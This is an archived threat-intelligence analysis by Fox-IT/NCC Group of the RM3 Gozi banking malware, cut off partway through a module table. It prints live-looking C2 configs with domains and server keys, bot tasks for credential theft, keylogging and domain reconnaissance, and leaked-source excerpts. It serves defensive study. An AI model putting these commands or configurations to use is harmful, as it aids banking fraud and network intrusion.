{ "id": "0a561553-b31c-4d35-aa9d-93a4cfbbc3b4", "created_at": "2026-04-06T01:29:54.602298Z", "updated_at": "2026-04-10T03:36:48.397142Z", "deleted_at": null, "sha1_hash": "2a6ddec1042a190564dae5c5d5fcbd5f120564c0", "title": "RM3 – Curiosities of the wildest banking malware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1329880, "plain_text": "RM3 – Curiosities of the wildest banking malware\r\nBy riftsle\r\nPublished: 2021-05-04 · Archived: 2026-04-06 00:19:03 UTC\r\nfumik0_ \u0026 the RIFT Team\r\nTL:DR\r\nOur Research and Intelligence Fusion Team have been tracking the Gozi variant RM3 for close to 30 months. In\r\nthis post we provide some history, analysis and observations on this most pernicious family of banking malware\r\ntargeting Oceania, the UK, Germany and Italy. \r\nWe’ll start with an overview of its origins and current operations before providing a deep dive technical analysis\r\nof the RM3 variant. \r\nIntroduction\r\nDespite its long and rich history in the cyber-criminal underworld, the Gozi malware family is surrounded with\r\nmystery and confusion. The leaking of its source code only increased this confusion as it led to an influx\r\nof Gozi variants across the threat landscape.  \r\nAlthough most variants were only short-lived – they either disappeared or were taken down by law enforcement –\r\n a few have had greater staying power. \r\nSince September 2019, Fox-IT/NCC Group has intensified its research into known active Gozi variants. These\r\nare operated by a variety of threat actors (TAs) and generally cause financial losses by either direct involvement\r\nin transactional fraud, or by facilitating other types of malicious activity, such as targeted ransomware activity. \r\nGozi ISFB started targeting financial institutions around 2013-2015 and hasn’t stopped since then. It is one of the\r\nfew – perhaps the only – main active branches of the notorious 15 year old Gozi / CRM. Its popularity\r\nis probably due to the wide range of variants which are available and the way threat actor groups can use these for\r\ntheir own goals. \r\nIn 2017, yet another new version was detected in the wild with a number of major modifications compared to the\r\nprevious main variant:\r\nRebranded RM loader (called RM3) \r\nUsed exotic PE file format exclusively designed for this banking malware \r\nModular architecture \r\nNetwork communication reworked \r\nNew modules \r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 1 of 52\n\nGiven the complex development history of the Gozi ISFB forks, it is difficult to say with any certainty which\r\nvariant was used as the basis for RM3. This is further complicated by the many different names used by the Cyber\r\nThreat Intelligence and Anti-Virus industries for this family of malware. But if you would like to understand the\r\nrather tortured history of this particular malware a little better, the research and blog posts on the subject by\r\nCheck Point are a good starting point.\r\nBanking malware targeting mainly Europe \u0026 Oceania\r\nWith more than four years of activity, RM3 has had a significant impact on the financial fraud landscape by\r\nspreading a colossal number of campaigns, principally across two regions:\r\nOceania, to date, Australia and New Zealand are the most impacted countries in this region. Threat actors\r\nseemed to have significant experience and used traditional means to conduct fraud and theft, mainly using\r\nweb injects to push fakes or replacers directly into financial websites. Some of these injectors are more\r\nadvanced than the usual ones that could be seen in bankers, and suggest the operators behind them were\r\nmore sophisticated and experienced.\r\nEurope, targeting primarily the UK, Germany and Italy. In this region, a manual fraud strategy was\r\ngenerally followed which was drastically different to the approach seen in Oceania.\r\nTwo different approaches to fraud used in Europe and Oceania\r\nIt’s worth noting that ‘Elite’ in this context means highly skilled operators. The injects provided and the C\u0026C\r\nservers are by far the most complicated and restricted ones seen up to this date in the fraud landscape.\r\nFox-IT/NCC Group has currently counted at least eight* RM3 infrastructures:\r\n4 in Europe\r\n2 in Oceania (that seem to be linked together based on the fact that they share the same inject\r\nconfigurations)\r\n1 worldwide (using AES-encryption)\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 2 of 52\n\n1 unknown\r\nLooking back, 2019 seems to have been a golden age (at least from the malware operators’ perspective), with five\r\noperators active at the same time. This golden age came to a sudden end with a sharp decline in 2020.\r\nRM3 timeline of active campaigns seen in the wild\r\nEven when some RM3 controllers were not delivering any new campaigns, they were still managing their bots by\r\npushing occasional updates and inspecting them carefully. Then, after a number of weeks, they start performing\r\nfraud on the most interesting targets. This is an extremely common pattern among bank malware operators in our\r\nexperience, although the reasons for this pattern remain unclear. It may be a tactic related to maintaining stealth or\r\nit may simply be an indication of the operators lagging behind the sheer number of infections.\r\nThe global pandemic has had a noticeable impact on many types of RM3 infrastructure, as it has on all malware\r\nas a service (MaaS) operations. The widespread lockdowns as a result of the pandemic have resulted in a massive\r\nnumber of bots being shut down as companies closed and users were forced to work from home, in some cases\r\nusing personal computers. This change in working patterns could be an explanation for what happened between\r\nQ1 \u0026 Q3 2020, when campaigns were drastically more aggressive than usual and bot infections intensified (and\r\nwere also of lower quality, as if it was an emergency). The style of this operation differed drastically from the way\r\nin which RM3 operated between 2018 and 2019, when there was a partnership with a distributor actor called\r\nSagrid.\r\nAnalysis of the separate campaigns reveals that individual campaign infrastructures are independent from each of\r\nthe others and operate their own strategies:\r\nRM3 Infra Tasks Injects †\r\nFinancial VNC SOCKS\r\nUK 1 No‡ Yes Yes Yes\r\nUK 2 Yes No No No\r\nItaly No‡ Yes Yes Yes\r\nAustralia/NZ 1 Yes Yes No‡ No\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 3 of 52\n\nRM3 Infra Tasks Injects †\r\nAustralia/NZ 2 Yes Yes No‡ No\r\nRM3 .at ??? ??? ??? ???\r\nGermany ??? ??? ??? ???\r\nWorldwide Yes No No No\r\n† Based on the web inject configuration file from config.bin\r\n‡ Based on active campaign monitoring, threat actor team(s) are mainly inspecting bots to manually push extra\r\ncommands like VNC module for starting fraud activities.\r\nA robust and stable distribution routine\r\nAs with many malware processes, renewing bots is not a simple, linear thing and many elements have to be taken\r\ninto consideration:\r\nMalware signatures\r\nPacker evading AV/EDR\r\nDistribution used (ratio effectiveness)\r\nTime of an active campaign before being takedown by abuse\r\nMany channels have been used to spread this malware, with distribution by spam (malspam) the most popular –\r\nand also the most effective. Multiple distribution teams are behind these campaigns and it is difficult to identify all\r\nof them; particularly so now, given the increased professionalisation of these operations (which now can involve\r\nshorter term, contractor like relationships). As a result, while malware campaign infrastructures are separate, there\r\nis now more overlap between the various infrastructures. It is certain however that one actor known as Sagrid was\r\ndefinitely the most prolific distributor. Around 2018/2019, Sagrid actively spread malware in Australia and New\r\nZealand, using advanced techniques to deliver it to their victims.\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 4 of 52\n\nRM3 distribution over the past 4 years\r\nThe graphic below shows the distribution method of an individual piece of RM3 malware in more detail.\r\nA simplified path of a payload from its compilation to its delivery\r\nInterestingly, the only exploit kit seen to be involved in the distribution of RM3 has been  Spelevo – at least in our\r\nexperience. These days, Exploit Kits (EK) are not as active as in their golden era in the 2010s (when Angler EK\r\ndominated the market along with Rig and Magnitude). But they are still an interesting and effective technique for\r\ngathering bots from corporate networks, where updates are complicated and so can be delayed or just not\r\nperformed. In other words, if a new bot is deployed using an EK, there is a higher chance that it is part of big\r\nnetwork than one distributed by a more ‘classic’ malspam campaign.\r\nStrangely, to this date, RM3 has never been observed targeting financial institutions in North America. Perhaps\r\nthere are just no malicious actors who want to be part of this particular mule ecosystem in that zone. Or perhaps\r\nall the malicious actors in this region are still making enough money from older strains or another banking\r\nmalware.\r\nNowadays, there is a steady decline in banking malware in general, with most TAs joining the rising and explosive\r\nransomware trend. It is more lucrative for bank malware gangs to stop their usual business and try to get some\r\nexclusive contracts with the ransom teams. The return on investment (ROI) of a ransom paid by a victim is\r\nsignificantly higher than for the whole classic money mule infrastructure. The cost and time required in money\r\nmule and inject operations are much more complex than just giving access to an affiliate and awaiting royalties.\r\nLarge number of financial institutions targeted\r\nFox-IT/NCC Group has identified more than 130 financial institution targeted by threat actor groups using this\r\nbanking malware. As the table below shows, the scope and impact of these attacks is particularly concentrated on\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 5 of 52\n\nOceania. This is also the only zone where loan and job websites are targeted. Of course, targeting job websites\r\nprovides them with further opportunities to hire money mules more easily within their existing systems.\r\nCountry Banks Web Shops Job Offers Loans Crypto Services\r\nUK 28 1 0 0 0\r\nIT 17 0 0 0 0\r\nAU/NZ 80~ 0 2 2 6\r\nA short timeline of post-pandemic changes\r\nAs we’ve already said, the pandemic has had an impact across the entire fraud landscape and forced many TAs\r\n(not just those using RM3) to drastically change their working methods. In some cases, they have shut down\r\ncompletely in one field and started doing something else. For RM3 TAs, as for all of us, these are indeed\r\ninteresting times.\r\nQ3 2019 – Q2 2020, Classic fraud era\r\nBefore the pandemic, the tasks pushed by RM3 were pretty standard when a bot was part of the infrastructure.\r\nThe example below is a basic check for a legitimate corporate bot with an open access point for a threat actor to\r\nconnect to and start to use for fraud.\r\nGET_CREDS\r\nGET_SYSINFO\r\nLOAD_MODULE=mail.dll,UXA\r\nLOAD_KEYLOG=*\r\nLOAD_SOCKS=XXX.XXX.XXX.XXX:XXXX\r\nOtherwise, the banking malware was configured as an advanced infostealer, designed to steal data and intercept all\r\nkeyboard interactions.\r\nGET_CREDS\r\nLOAD_MODULE=mail.dll,UXA\r\nLOAD_KEYLOG=*\r\nQ4 2020 – Now, Bot Harvesting Era\r\nNowadays, bots are basically  removed if they are coming from old infrastructures, if they are not part of an active\r\ncampaign. It’s an easy way for them for removing researcher bots\r\nDEL_CONFIG\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 6 of 52\n\nOtherwise, this is a classic information gathering system operation on the host and network. Which indicates TAs\r\nare following the ransomware path and declining their fraud legacy step by step.\r\nGET_SYSINFO\r\nRUN_CMD=net group \"domain computers\" /domain\r\nRUN_CMD=net session\r\nRM3 Configs – Invaluable threat intelligence data\r\nRM3.AT\r\nAround the summer of 2019, when this banking malware was at its height, an infrastructure which was very\r\ndifferent from the standard ones first emerged. It mostly used infostealers for distribution and pushed an\r\ninteresting variant of the RM3 loader.\r\nBased on configs, similarities with the GoziAT TAs were seen. The crossovers were:\r\nboth infrastructure are using the .at TLD\r\nsubdomains and domains are using the same naming convention\r\nServer ID is also different from the default one (12)\r\nDefault nameservers config\r\nFirst seen when GoziAT was curiously quiet\r\nAn example loader.ini file for RM3.at is shown below:\r\nLOADER.INI - RM3 .AT example\r\n{\r\n \"HOSTS\": [\r\n \"api.fiho.at\",\r\n \"t2.fiho.at\"\r\n ],\r\n \"NAMESERVERS\": [\r\n \"172.104.136.243\",\r\n \"8.8.4.4\",\r\n \"192.71.245.208\",\r\n \"51.15.98.97\",\r\n \"193.183.98.66\",\r\n \"8.8.8.8\"\r\n ],\r\n \"URI\": \"index.htm\",\r\n \"GROUP\": \"3000\",\r\n \"SERVER\": \"350\",\r\n \"SERVERKEY\": \"s2olwVg5cU7fWsec\",\r\n \"IDLEPERIOD\": \"10\",\r\n \"LOADPERIOD\": \"10\",\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 7 of 52\n\n\"HOSTKEEPTIMEOUT\": \"60\",\r\n \"DGATEMPLATE\": \"constitution.org/usdeclar.txt\",\r\n \"DGAZONES\": [\r\n \"com\",\r\n \"ru\",\r\n \"org\"\r\n ],\r\n \"DGATEMPHASH\": \"0x4eb7d2ca\",\r\n \"DGAPERIOD\": \"10\"\r\n}\r\nAs a reminder, the ISFB v2 variant called GoziAT (which technically uses the RM2 loader) uses the format\r\nshown below:\r\nLOADER.INI - GoziAT/ISFB (RM2 Loader)\r\n{\r\n \"HOSTS\": [\r\n \"api10.laptok.at/api1\",\r\n \"golang.feel500.at/api1\",\r\n \"go.in100k.at/api1\"\r\n ],\r\n \"GROUP\": \"1100\",\r\n \"SERVER\": \"730\",\r\n \"SERVERKEY\": \"F2oareSbPhCq2ch0\",\r\n \"IDLEPERIOD\": \"10\",\r\n \"LOADPERIOD\": \"20\",\r\n \"HOSTSHIFTTIMEOUT\": \"1\"\r\n}\r\nBut this RM3 infrastructure disappeared just a few weeks later and has never been seen again. It is not known if\r\nthe TAs were satisfied with the product and its results and it remains one of the unexplained curiosities of this\r\nbanking malware\r\nBut, we can say this marked the return of GoziAT, which was back on track with intense campaigns.\r\nOther domains related to this short lived RM3 infrastructure were.\r\napi.fiho.at\r\ny1.rexa.at\r\ncde.frame303.at\r\napi.frame303.at\r\nu2.inmax.at\r\ncdn5.inmax.at\r\ngo.maso.at\r\nf1.maso.at\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 8 of 52\n\nStandard routine for other infrastructures\r\nMeanwhile, a classic loader config will mostly need standard data like any other malware:\r\nC\u0026C domains (called hosts on the loader side)\r\nTimeout values\r\nKeys\r\nThe example below shows a typical loader.ini file from a more ‘classic’ infrastructure. This one is from Germany,\r\nbut similar configurations were seen in the UK1, Australia/New Zealand1 and Italian infrastructures:\r\nLOADER.INI – DE\r\n{\r\n \"HOSTS\": \"https://daycareforyou.xyz\",\r\n \"ADNSONLY\": \"0\",\r\n \"URI\": \"index.htm\",\r\n \"GROUP\": \"40000\",\r\n \"SERVER\": \"12\",\r\n \"SERVERKEY\": \"z2Ptfc0edLyV4Qxo\",\r\n \"IDLEPERIOD\": \"10\",\r\n \"LOADPERIOD\": \"10\",\r\n \"HOSTKEEPTIMEOUT\": \"60\",\r\n \"DGATEMPLATE\": \"constitution.org/usdeclar.txt\",\r\n \"DGAZONES\": [\r\n \"com\",\r\n \"ru\",\r\n \"org\"\r\n ],\r\n \"DGATEMPHASH\": \"0x4eb7d2ca\",\r\n \"DGAPERIOD\": \"10\"\r\n}\r\nUpdates to RM3 were observed to be ongoing, and more fields have appeared since the 3009XX builds (e.g:\r\n300912, 900932):\r\nConfiguring the self-removing process\r\nSetup the loader module as the persistent one\r\nThe Anti-CIS (langid field) is also making a comeback\r\nThe example below shows a typical client.ini file as seen in build 3009xx from the UK2 and Australia/New\r\nZealand 2 infrastructures:\r\nCLIENT.INI\r\n{\r\n \"HOSTS\": \"https://vilecorbeanca.xyz\",\r\n \"ADNSONLY\": \"0\",\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 9 of 52\n\n\"URI\": \"index.htm\",\r\n \"GROUP\": \"92020291\",\r\n \"SERVER\": \"12\",\r\n \"SERVERKEY\": \"kD9eVTdi6lgpH0Ml\",\r\n \"IDLEPERIOD\": \"10\",\r\n \"LOADPERIOD\": \"10\",\r\n \"HOSTKEEPTIMEOUT\": \"60\",\r\n \"NOSCRIPT\": \"0\",\r\n \"NODELETE\": \"0\",\r\n \"NOPERSISTLOADER\": \"0\",\r\n \"LANGID\": \"RU\",\r\n \"DGATEMPLATE\": \"constitution.org/usdeclar.txt\",\r\n \"DGATEMPHASH\": \"0x4eb7d2ca\",\r\n \"DGAZONES\": [\r\n \"com\",\r\n \"ru\",\r\n \"org\"\r\n ],\r\n \"DGAPERIOD\": \"10\"\r\n}\r\nThe client.ini file mainly stores elements that will be required for the explorer.dll module:\r\nTimeouts values\r\nMaximum size allowed for RM3 requests to the controllers\r\nVideo config\r\nHTTP proxy activation\r\nCLIENT.INI - Default Format\r\n{\r\n \"CONTROLLER\": [\r\n \"\",\r\n ],\r\n \"ADNSONLY\": \"0\",\r\n \"IPRESOLVERS\": \"curlmyip.net\",\r\n \"SERVER\": \"12\",\r\n \"SERVERKEY\": \"\",\r\n \"IDLEPERIOD\": \"300\",\r\n \"TASKTIMEOUT\": \"300\",\r\n \"CONFIGTIMEOUT\": \"300\",\r\n \"INITIMEOUT\": \"300\",\r\n \"SENDTIMEOUT\": \"300\",\r\n \"GROUP\": \"\",\r\n \"HOSTKEEPTIMEOUT\": \"60\",\r\n \"HOSTSHIFTTIMEOUT\": \"60\",\r\n \"RUNCHECKTIMEOUT\": \"10\",\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 10 of 52\n\n\"REMOVECSP\": \"0\",\r\n \"LOGHTTP\": \"0\",\r\n \"CLEARCACHE\": \"1\",\r\n \"CACHECONTROL\": [\r\n \"no-cache,\",\r\n \"no-store,\",\r\n \"must-revalidate\"\r\n ],\r\n \"MAXPOSTLENGTH\": \"300000\",\r\n \"SETVIDEO\": [\r\n \"30,\",\r\n \"8,\",\r\n \"notipda\"\r\n ],\r\n \"HTTPCONNECTTIME\": \"480\",\r\n \"HTTPSENDTIME\": \"240\",\r\n \"HTTPRECEIVETIME\": \"240\"\r\n}\r\nWhat next?\r\nActive monitoring of current in-the-wild instances suggests that the RM3 TAs are progressively switching to the\r\nransomware path. That is, they have not pushed any updates on the fraud side of their operations for a number of\r\nmonths (by not pushing any injects), but they are still maintaining their C\u0026C infrastructure. All infrastructure has\r\na cost and the fact they are maintaining their C\u0026C infrastructure without executing traditional fraud is a strong\r\nindication they are changing their strategy to another source of income.\r\nThe tasks which are being pushed (and old ones since May 2020) are triage steps for selecting bots which could be\r\nused for internal lateral movement. This pattern of behaviour is becoming more evident everyday in the latest\r\nongoing campaigns, where everyone seems to be targeted and the inject configurations have been totally removed.\r\nAs a reminder, over the past two years banking malware gangs in general have been seen to follow this trend. This\r\nis due to the declining fraud ecosystem in general, but also due to the increased difficulty in finding inject\r\ndevelopers with the skills to develop effective fakes which this decline has also prompted.\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 11 of 52\n\nHow banking TAs can migrate from fraud to ransom (or any other businesses)\r\nWe consider RM3 to be the most advanced ISFB strain to date, and fraud tools can easily be switched into a\r\nmalicious red team like strategy.\r\nRM3 evolving to support two different use cases at the same time\r\nWhy is RM3 the most advanced ISFB strain?\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 12 of 52\n\nAs we said, we consider RM3 to be the most advanced ISFB variant we have seen. When we analyse the RM3\r\npayload, there is a huge gap between it and its predecessors. There are multiple differences:\r\nA new PE format called PX has been developed\r\nThe .bss section is slightly updated for storing RM3 static variables\r\nA new structure called WD based on the J1/J2/J3/JJ ISFB File Join system for storing files\r\nArchitecture differences between ISFB v2 and RM3 payload\r\n(main sections discussed below)\r\nPX Format\r\nAs mentioned, RM3 is designed to work with PX payloads (Portable eXecutable). This is an exotic file format\r\ncreated for, and only used with, this banking malware. The structure is not very different from the original PE\r\nformat, with almost all sections, data directories and section tables remaining intact. Essentially, use of the new\r\nfile format just requires malware to be re-crafted correctly in a new payload at the correct offset.\r\nPX Header\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 13 of 52\n\nBSS section\r\nThe bss section (Block Starting Symbol) is a critical data segment used by all strains of ISFB for storing\r\nuninitiated static local variables. These variables are encrypted and used for different interactions depending on\r\nthe module in use.\r\nIn a compiled payload, this section is usually named “.bss0”. But evidence from a source code leak shows that this\r\nis originally named “.bss” in the source code. These comments also make it clear that this module is encrypted.\r\nThe encrypted .bss section\r\nThis is illustrated by the source code comments shown below:\r\n// Original section name that will be created within a file\r\n#define CS_SECTION_NAME \".bss0\"\r\n// The section will be renamed after the encryption completes.\r\n// This is because we cannot use reserved section names aka \".rdata\" or \".bss\" during compile time.\r\n#define CS_NEW_SECTION_NAME \".bss\"\r\nWhen working with ISFB, it is common to see the same mechanism or routine across multiple compiled builds or\r\nvariants. However, it is still necessary to analyse them all in detail because slight adjustments are frequently\r\nintroduced. Understanding these minor changes can help with troubleshooting and explain why scripts don’t work.\r\nThe decryption routine in the bss section is a perfect example of this; it is almost identical to ISFB v2 variants, but\r\nthe RM3 developers decided to tweak it just slightly by creating an XOR key in a different way – adding a\r\nFILE_HEADER.TimeDateStamp with the gs_Cookie (this information based on the ISFB leak).\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 14 of 52\n\nDecrypted strings from the .bss section being parsed by IDA\r\nOccasionally, it is possible to see a debugged and compiled version of RM3 in the wild. It is unknown if this\r\nbehaviour is intended for some reason or simply a mistake by TA teams, but it is a gold mine for understanding\r\nmore about the underlying code.\r\nWD Struct\r\nISFB has its own way of storing and using embedded files. It uses a homemade structure that seems to change its\r\nname whenever there is a new strain or a major ISFB update:\r\nFJ or J1 – Old ISFB era\r\nJ2 – Dreambot\r\nJ3 – ISFB v3 (Only seen in Japan)\r\nJJ – ISFB v2 (v2.14+ – now)\r\nWD – RM3 / Saigon\r\nTo get a better understanding of the latest structure in use, it is worth taking a quick look back at the active strains\r\nof ISFB v2 still known to use the JJ system.\r\nThe structure is pretty rudimentary and can be summarised like this:\r\nstruct JJ_Struct {\r\n DWORD xor_cookie;\r\n DWORD crc32;\r\n DWORD size;\r\n DWORD addr;\r\n} JJ;\r\nWith RM3, they decided to slightly rework the join file philosophy by creating a new structure called WD. This is\r\nbasically just a rebranded concept; it just adds the JJ structure (seen above) and stores it as a pointer array.\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 15 of 52\n\nThe structure itself is really simple:\r\nstruct WD_Struct {\r\n DWORD size;\r\n WORD magic;\r\n WORD flag;\r\n JJ_Struct *jj;\r\n} WD;\r\nIn allRM3 builds, these structures simply direct the malware to grab an average of at least 4 files†:\r\nA PX loader\r\nAn RSA pubkey\r\nAn RM3 config\r\nA wordlist that will be mainly used for create subkeys in the registry\r\n† The amount of files is dependent on the loader stage or RM3 modules used. It is also based on the ISFB variant,\r\nas another file could be present which stores the langid value (which is basically the anti-cis feature for this\r\nbanking malware).\r\nArchitecture\r\nEvery major ISFB variant has something that makes it unique in some way. For example, the notorious Dreambot\r\nwas designed to work as a standalone payload; the whole loader stage walk-through was removed and bots were\r\ndirectly pointed at the correct controllers. This choice was mainly explained by the fact that this strain was\r\ndesigned to work as malware as a service. It is fairly standard right now to see malware developers developing\r\nspecific features for TAs – if they are prepared to pay for them. In these agreements, TAs can be guaranteed some\r\nkind of exclusivity with a variant or feature. However, this business model does also increase the risk of\r\nmisunderstanding and overlap in term of assigning ownership and responsibility. This is one of the reasons it is\r\nharder to get a clear picture of the activities happening between malware developers \u0026 TAs nowadays.\r\nBut to get back to the variant we are discussing here; RM3 pushed the ISFB modular plugin system to its\r\nmaximum potential by introducing a range of elements into new modules that had never been seen before. These\r\nnew modules included:\r\nbl.dll\r\nexplorer.dll\r\nrt.dll\r\nnetwrk.dll\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 16 of 52\n\nThese modules are linked together to recreate a modded client32.bin/client64.bin (modded from the client.bin seen\r\nin ISFB v2). This new architecture is much more complicated to debug or disassemble. In the end, however, we\r\ncan split this malware into 4 main branches:\r\nA modded client32.bin/client64.bin\r\nA browser module designed to setup hooks and an SSL proxy (used for POST HTTP/HTTPS interception)\r\nA remote shell (probably designed for initial assessments before starting lateral attacks)\r\nA fraud arsenal toolkit (hidden VNC, SOCKs proxy, etc…)\r\nRM3 Architecture\r\nRM3 Loader –\r\nMajor ISFB update? Or just a refactored code?\r\nThe loader is a minimalist plugin that contains only the required functions for doing three main tasks:\r\nContacting a loader C\u0026C (which is called host), downloading critical RM3 modules and storing them into\r\nthe registry (bl.dll, explorer.dll, rt.dll, netwrk.dll)\r\nSetting up persistence†\r\nRebooting everything and making sure it has removed itself†.\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 17 of 52\n\nAn overview of the second stage loader\r\nThese functions are summarised in the following schematic.‡\r\n† In the 3009XX build above, a TA can decide to setup the loader as persistent itself, or remove the payload.\r\n‡ Of course, the loader has more details than could be mentioned here, but the schematic shows the main concepts\r\nfor a basic understanding.\r\nRM3 Network beacons – Hiding the beast behind simple URIs\r\nC\u0026C beacon requests have been adjusted from the standard ISFB v2 ones, by simplifying the process with just\r\ntwo default URI. These URIs are dynamic fields that can be configured from the loader and client config. This is\r\nsomething that older strains are starting to follow since build 250172.\r\nWhen it switches to the controller side, RM3 saves HTTPS POST requests performed by the users. These are then\r\nused to create fake but legitimate looking paths.\r\nChanging RM3 URI path dynamically\r\nThis ingenious trick makes RM3 really hard to catch behind the telemetry generated by the bot. To make short,\r\nwhenever the user is browsing websites performing those specific requests, the malware is mimicking them by\r\nreplacing the domain with the controller one.\r\nhttps://\u003ccontroler_domain\u003e.tld/index.html \u003c- default\r\nhttps://\u003ccontroler_domain\u003e.tld/search/wp-content/app \u003c- timer cycle #1\r\nhttps://\u003ccontroler_domain\u003e.tld/search/wp-content/app\r\nhttps://\u003ccontroler_domain\u003e.tld/search/wp-content/app\r\nhttps://\u003ccontroler_domain\u003e.tld/search/wp-content/app\r\nhttps://\u003ccontroler_domain\u003e.tld/admin/credentials/home \u003c- timer cycle #2\r\nhttps://\u003ccontroler_domain\u003e.tld/admin/credentials/home\r\nhttps://\u003ccontroler_domain\u003e.tld/admin/credentials/home\r\nhttps://\u003ccontroler_domain\u003e.tld/admin/credentials/home\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 18 of 52\n\nhttps://\u003ccontroler_domain\u003e.tld/operating/static/template/index.php \u003c- timer cycle #3\r\nhttps://\u003ccontroler_domain\u003e.tld/operating/static/template/index.php\r\nhttps://\u003ccontroler_domain\u003e.tld/operating/static/template/index.php\r\nhttps://\u003ccontroler_domain\u003e.tld/operating/static/template/index.php\r\nIf that wasn’t enough, the usual base64 beacons are now hidden as a data form and send by means of POST\r\nrequests. When decrypted, these requests reveal this typical network communication.\r\nrandom=rdm\u0026type=1\u0026soft=3\u0026version=300960\u0026user=17fe7d78280730e52b545792f07d61cb\u0026group=21031\u0026id=00000024\r\nThe fields can be explained in as follows:\r\nField Meaning\r\nrandom A mandatory randomised value\r\ntype Data format\r\nsoft Network communication method\r\nversion Build of the RM3 banking malware\r\nuser User seed\r\ngroup Campaign ID\r\nid RM3 Data type\r\narc Module with specific architecture (0 =  i386 – 1= 86_x64)\r\nsize Stolen data size\r\nuptime Bot uptime\r\nsysid Machine seed\r\nos Windows version\r\nSoft – A curious ISFB Field\r\nValue Stage C\u0026C\r\nNetwork\r\nCommunication\r\nResponse Format\r\n(\u003c Build 300960)\r\nResponse\r\nFormat\r\n(Build 300960)\r\n3\r\nHost\r\n(Loader)\r\nWinAPI\r\nBase64(RSA +\r\nSerpent)\r\nBase64(RSA +\r\nAES)\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 19 of 52\n\nValue Stage C\u0026C\r\nNetwork\r\nCommunication\r\nResponse Format\r\n(\u003c Build 300960)\r\nResponse\r\nFormat\r\n(Build 300960)\r\n2\r\nHost\r\n(Loader)\r\nCOM\r\nBase64(RSA +\r\nSerpent)\r\nBase64(RSA +\r\nAES)\r\n1 Controller WinAPI/COM RSA + Serpent RSA + AES\r\nID – A field being updated RM3\r\nThanks to the source code leak, identifying the data type is not that complicated and can be determined from the\r\nfield “id”\r\nБот отправляет на сервер файлы следующего типа и формата (тип данных задаётся параметром t\r\nSEND_ID_UNKNOWN 0 - неизвестно, используется только для тестирования\r\nSEND_ID_FORM 1 - данные HTML-форм. ASCII-заголовок + форма бинарном виде, как есть\r\nSEND_ID_FILE 2 - любой файл, так шлются найденные по маске файлы\r\nSEND_ID_AUTH 3 - данные IE Basic Authentication, ASCII-заголовок + бинарные данные\r\nSEND_ID_CERTS 4 - сертификаты. Файлы PFX упакованые в CAB или ZIP.\r\nSEND_ID_COOKIES 5 - куки и SOL-файлы. Шлются со структурой каталогов. Упакованы в CAB ил\r\nSEND_ID_SYSINFO 6 - информация о системе. UTF8(16)-файл, упакованый в CAB или ZIP\r\nSEND_ID_SCRSHOT 7 - скриншот. GIF-файл.\r\nSEND_ID_LOG 8 - внутренний лог бота. TXT-файл.\r\nSEND_ID_FTP 9 - инфа с грабера FTP. TXT-файл.\r\nSEND_ID_IM 10 - инфа с грабера IM. TXT-файл.\r\nSEND_ID_KEYLOG 11 - лог клавиатуры. TXT-файл.\r\nSEND_ID_PAGE_REP 12 - нотификация о полной подмене страницы TXT-файл.\r\nSEND_ID_GRAB 13 - сграбленый фрагмент контента. ASCII заголовок + контент, как он есть\r\nOver time, they have created more fields:\r\nNew Command ID Description\r\nSEND_ID_CMD 19 Results from the CMD_RUN command\r\nSEND_ID_??? 20 –\r\nSEND_ID_CRASH 21 Crash dump\r\nSEND_ID_HTTP 22 Send HTTP Logs\r\nSEND_ID_ACC 23 Send credentials\r\nSEND_ID_ANTIVIRUS 24 Send Antivirus info\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 20 of 52\n\nModule list\r\nAnalysis indicates that any RM3 instance would have to include at least the following modules:\r\nCRC Module Name\r\nPE\r\nFormat\r\nStage Description\r\n– – MZ – 1st stage RM3 loader\r\n0xc535d8bf loader.dll PX – 2nd stage RM3 loader\r\n– – MZ –\r\nRM3 Startup module hidden\r\nin the shellcode\r\n0x8576b0d0 bl.dll PX Host RM3 Background Loader\r\n0x224c6c42 explorer.dll PX Host RM3 Mastermind\r\n0xd6306e08 rt.dll PX Host\r\nRM3 Runtime DLL – RM3\r\nWinAPI/COM Module\r\n0x45a0fcd0 netwrk.dll PX Host RM3 Network API\r\n0xe6954637 browser.dll PX Controller\r\nBrowser Grabber/HTTPS\r\nInterception\r\n0x5f92dac2 iexplore.dll PX Controller\r\nInternet explorer Hooking\r\nmodule\r\n0x309d98ff firefox.dll PX Controller Firefox Hooking module\r\n0x309d98ff microsoftedgecp.dll PX Controller\r\nMicrosoft Edge Hooking\r\nmodule (old one)\r\n0x9eff4536 chrome.dll PX Controller\r\nGoogle chrome Hooking\r\nmodule\r\n0x7b41e687 msedge.dll PX 